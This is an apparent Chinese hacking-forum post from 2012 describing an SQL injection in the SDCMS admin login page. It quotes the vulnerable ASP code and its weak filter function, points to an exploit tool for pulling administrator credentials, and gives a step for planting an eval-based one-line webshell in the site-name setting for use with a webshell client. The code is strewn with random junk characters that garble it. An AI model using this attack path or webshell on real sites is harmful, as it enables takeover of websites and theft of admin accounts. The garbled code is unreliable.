作者:T00LS 鬼哥: C0 J2 l3 G) V0 X( T, }1 w
漏洞文件:后台目录/index.asp" j$ W9 ~6 v7 Z( Z( {& I+ y4 m
' D# d/ H& [, y* u1 j) DSub Check
8 o6 W2 n' v ?* O- l1 Q* F Dim username,password,code,getcode,Rs
/ @% O) T `+ M# Q& }$ N# E" y6 v IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub0 ?! \3 `6 k7 O0 G2 U
username=FilterText(Trim(Request.Form("username")),1)& _1 s# l# [8 W# y# U
password=FilterText(Trim(Request.Form("password")),1)
% m& E6 H- p, k, z# I5 H code=Trim(Request.Form("yzm"))
/ D+ {; {* w7 `4 F getcode=Session("SDCMSCode")
- K" [1 q6 |' f5 A) @ IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
6 L' O# f3 Y7 }2 l IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied5 k- y. I- }4 d& U6 T
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
9 c- p% s9 _# y6 Z2 i IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
0 ?/ v) T6 ^1 g9 j" q$ ~* y IF username="" or password="" Then
5 u. Y* B1 ]" s% O( L$ R! C Echo "用户名或密码不能为空"ied6 S& j/ j& Z- N4 C" f
Else
& U' f7 o- [- E* U7 N- N5 I Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")3 e2 p& g0 _+ ^+ S6 M* n( t
IF Rs.Eof Then
* J" M; y* M9 {2 f AddLog username,GetIp,"登录失败",1
1 k9 z# U, U# ^' E' H Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
3 q" {, }6 \+ ~ Else/ I o. ]) B" N- H
Add_Cookies "sdcms_id",Rs(0)
9 I7 h- @. F& y* E$ b Add_Cookies "sdcms_name",username5 e6 V- n% l9 J: e4 w
Add_Cookies "sdcms_pwd",Rs(2)
4 [: |7 ]8 \/ a: [ Add_Cookies "sdcms_admin",Rs(3)& ~$ }( t$ K$ L7 O- h( \% _% f
Add_Cookies "sdcms_alllever",Rs(4)" a. H2 Y$ g2 B3 A( N
Add_Cookies "sdcms_infolever",Rs(5)0 k8 l5 p% d$ J4 y
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
: n; h' d3 a- n7 y, W6 o% ?3 A AddLog username,GetIp,"登录成功",1
# y; c8 Z/ Z" t) U/ } '自动删除30天前的Log记录: J+ {- b: e- [# X7 |
IF Sdcms_DataType Then
/ C7 d( I7 x1 e- e+ S2 [1 u Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")! j5 {# I! W% @" d: q" f
Else+ a: l+ a! _1 O' \9 o9 @3 r0 V
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")' d& W# u8 x! z& |. S
End IF5 i# j9 `( M9 u
Go("sdcms_index.asp"); |# f+ y U g2 ]1 {; H" g: P
End IF
. [$ u. S$ g, y Rs.Close! a% H& o5 x# p: S0 s( s
Set Rs=Nothing/ T7 j8 g6 D" b2 ^
End IF
8 I3 s) _! p+ n4 ?$ }& r9 v3 kEnd Sub
) I) N- V! N+ k9 `1 i k' T/ h3 `$ o" a# a6 c q
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码3 Z8 C! a6 }) q# h
2 m; l: u6 S% }" t7 L0 _$ @Function FilterText(ByVal t0,ByVal t1)5 O4 x% k+ z* X+ m- Y2 I; u) ?
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
4 ?% L8 `7 F q0 }' k4 O( \' y t0=Trim(t0)" h1 @ K |6 t/ V; ~
Select Case t15 Z) \! l# y2 ~
Case "1"
1 j1 }+ G2 Y% I. o/ { t0=Replace(t0,Chr(32),"")
; [' I$ ^0 C5 i9 U7 [ t0=Replace(t0,Chr(13),"")
2 \2 B B0 k) C t0=Replace(t0,Chr(10)&Chr(10),"")
* f% R F) I" t( j t0=Replace(t0,Chr(10),"")6 l0 K& F( W# C+ O4 G
Case "2") W" n3 R, j `; ~3 @# ?( |
t0=Replace(t0,Chr(8),"")'回格0 v' l8 s# k$ t V- z- k1 L
t0=Replace(t0,Chr(9),"")'tab(水平制表符)2 h. h2 j0 u9 {
t0=Replace(t0,Chr(10),"")'换行
& q f7 u# G1 l. ?5 w t0=Replace(t0,Chr(11),"")'tab(垂直制表符)% C, ~3 V7 w& X8 k. W' C4 G- Z( c
t0=Replace(t0,Chr(12),"")'换页
1 m' Z2 u0 R% i0 B# J# x t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
+ s# j! Q9 ^6 C8 } t0=Replace(t0,Chr(22),"")5 k! L9 I3 O+ m* ]) }" S7 ~
t0=Replace(t0,Chr(32),"")'空格 SPACE
0 `; ] @5 F k( u4 p# F t0=Replace(t0,Chr(33),"")'!
) A3 t( O4 _& D# g# \ t0=Replace(t0,Chr(34),"")'"
8 f- w0 E( X( b) J5 [ t0=Replace(t0,Chr(35),"")'#
+ ?: p6 f/ h o+ O) x) I& V5 \ t0=Replace(t0,Chr(36),"")'$
3 D# ~3 m0 o( f2 Z t0=Replace(t0,Chr(37),"")'%
! `. o5 H1 d- B' O" A0 G t0=Replace(t0,Chr(38),"")'&
: A& r. u' T9 v! q9 ^ t0=Replace(t0,Chr(39),"")''
% v. G R8 G1 h t0=Replace(t0,Chr(40),"")'(8 W! U7 ~9 z0 ~
t0=Replace(t0,Chr(41),"")')- Q: g, ?( ]1 l& X" F5 X+ b4 n
t0=Replace(t0,Chr(42),"")'*5 Z0 t5 _( s% M$ U. t$ T# s6 \
t0=Replace(t0,Chr(43),"")'+4 v% L$ k) Z- a* O P
t0=Replace(t0,Chr(44),"")',
1 U. [+ q2 l, Z" k& r t0=Replace(t0,Chr(45),"")'-6 t* a- h& F% q& [3 e- o1 ?* X
t0=Replace(t0,Chr(46),"")'.- _4 Z( i! Y" b% |
t0=Replace(t0,Chr(47),"")'/" |4 K8 T$ R& `- ~3 \+ \! A
t0=Replace(t0,Chr(58),"")':5 ?0 z. J5 M3 o% m
t0=Replace(t0,Chr(59),"")';
: Y; e! ?/ n5 \: \4 `" o t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
8 e2 G8 d/ ^ M0 t4 c! m t0=Replace(t0,Chr(63),"")'?, p# X. u5 v6 ^ a L
t0=Replace(t0,Chr(64),"")'@
2 B7 I/ \8 n, e, a t0=Replace(t0,Chr(91),"")'\5 m- \8 F) [$ M0 T
t0=Replace(t0,Chr(92),"")'\
8 l* z3 n1 N/ x: W t0=Replace(t0,Chr(93),"")']
. I' p: G" E- @, g% i t0=Replace(t0,Chr(94),"")'^
+ |( M" r/ Y3 y5 [# i' U0 a" U) ~+ d p t0=Replace(t0,Chr(95),"")'_' o3 E( I& L+ x: r0 j% P# h: ~$ h
t0=Replace(t0,Chr(96),"")'`6 b) v* M$ w+ C' a+ Y
t0=Replace(t0,Chr(123),"")'{
* k; @6 x: `" T1 z6 f t0=Replace(t0,Chr(124),"")'|6 b$ r n* G" d& W; r! [: l- @
t0=Replace(t0,Chr(125),"")'}
4 ~0 w3 R+ Z6 L t0=Replace(t0,Chr(126),"")'~
% ~3 g1 @- ^+ f! A9 P Case Else9 i9 M2 c; E/ m9 M& _. m. B9 a: F
t0=Replace(t0, "&", "&")( n/ s3 |6 g/ Z, r- z% x1 P6 X. k* ?8 _
t0=Replace(t0, "'", "'")
! w) A( E0 G( }! ] t0=Replace(t0, """", """)$ c' p/ H5 w; g7 \8 }! [6 F
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">"): l3 k& O$ }" i$ [
End Select
0 ^9 R( \: s% E IF Instr(Lcase(t0),"expression")>0 Then
; ^, q7 e' _/ w7 v! m) d+ c t0=Replace(t0,"expression","e­xpression", 1, -1, 0)& r2 N. x& Z" Q3 J# K! D
End If9 S1 u# s+ `3 Y: e& ]3 @
FilterText=t0* H! U& X( X& R: }
End Function8 P6 Z3 I' D3 Y7 }% y7 R
5 a* z; `5 k2 f) v6 |% l看到没。直接参数是1 只过滤! Z! `3 n) S6 A' p, _8 S, M
t0=Replace(t0,Chr(32)," ")* H, n" ]2 E+ Z8 X
t0=Replace(t0,Chr(13),"")
) Y5 t2 w' k, `, n t0=Replace(t0,Chr(10)&Chr(10),"+ F. N" K8 |* a" @
")9 o6 }- o( o. p/ `7 b
t0=Replace(t0,Chr(10),"
/ y' b( H" k; i; x! x")
7 ?/ r1 Y" V" ?) d% c漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
- I! F1 |% r7 t' t5 j6 qEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP& @5 s, P2 v+ J) I
1 W x$ N( f2 W* ~3 s% w9 Z
测试:# L# Y5 Q: N" Z' J3 E
7 ^( a) ~7 `9 t
1 o$ y" O1 H/ Q& U. q现在输入工具上验证码,然后点OK
% u* e5 X/ H v
; r: M+ x" r. P0 P- C' m. P% e4 a$ ]! Y; D6 x' y6 F: T5 r
看到我们直接进入后台管理界面了,呵呵!
9 x" j2 i" {- [ [- N8 ~
% H: `- d2 a0 A6 d" ^5 w0 {' r/ i
$ W; p7 {; O( ^! c- Z
这样直接进入后台了。。。。
7 w! O( y' c+ i9 a) @
* g) z( L; a( F : h% Y$ J; R3 W: ?8 {
; A B! `. x! s e0 o/ @- [
SDCMS提权:7 I- d7 H8 S" R S g: ]% w
5 j2 p6 @' V' W2 J) T7 h. C( ]方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?3 Q G+ Z% x, ?. x' f: W+ c
/ p% T. p6 w0 n0 p" y/ z0 u0 V: `. D
# z3 [: c7 C' A" v8 P
* W! m0 {9 F2 }3 ^# t) A# ~OK,现在用菜刀连接下!
. U" h# k( Z/ [
. k' P% D( c: v$ y/ |; G
/ _: O' n7 T2 a. G5 ]$ F) a. L
; l: ^, w9 g W( a
1 A z, E) J$ q7 W+ D6 n, E9 F5 _2 |' y
|
发表于 2012-11-9 20:57:02
收藏
支持
反对